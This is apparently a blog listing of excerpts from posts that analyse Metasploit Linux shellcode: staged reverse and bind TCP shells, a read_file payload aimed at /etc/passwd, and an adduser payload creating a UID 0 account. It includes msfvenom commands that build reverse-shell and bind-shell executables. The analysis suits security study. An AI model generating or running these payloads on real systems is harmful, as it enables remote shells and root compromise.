Analysis of Metasploit linux/x64/shell/reverse_tcp shellcode

linux/x64/shell/reverse_tcp staged shellcode generally consists of following steps Map 4096 bytes in process’ VAS memory Create and connect socket to remote address and port Wait for incoming data and save them into mapped memory Execute saved data Shellcode demonstration Create elf64 executable with msfvenom $ msfvenom -p linux/x64/shell/reverse_tcp -f elf -a x64 –platform linux LHOST=127.1.1.2 LPORT=5555 -o staged_reverse_tcp Set up …

Analysis of Metasploit linux/x64/shell/bind_tcp shellcode

linux/x64/shell/bind_tcp staged shellcode generally consists of following steps Create listening port and wait for connection Map 4096 bytes in process’ VAS memory Wait for incoming data and save them into mapped memory Execute saved data Shellcode demonstration Create elf64 executable with msfvenom $ msfvenom -p linux/x64/shell/bind_tcp -f elf -a x64 –platform linux LPORT=1234 -o staged_bind_tcp_x64 Execute the stager $ chmod …

Analysis of Metasploit linux/x86/read_file shellcode

This post analyses innards of linux/x86/read_file shellcode. This shellcode reads from the local file system and writes it back out to the specified file descriptor. Initial shellcode overview and testing Inspect payload options and generate shellcode for analysis linux/x86/read_file payload has two options. We will keep FD set to 1 (STDOUT) and set path to /etc/passwd. At first glance the …

Analysis of Metasploit linux/x86/adduser shellcode

This post analyses innards of linux/x86/adduser shellcode. Running this shellcode adds custom user with UID=0 to /etc/passwd. Initial shellcode overview and testing Inspect payload options and generate shellcode for analysis linux/x86/adduser payload has three options. We will generate shellcode with custom user and password Insert generated shellcode into testing C wrapper Running shellcode as sudoer we get new user someusr …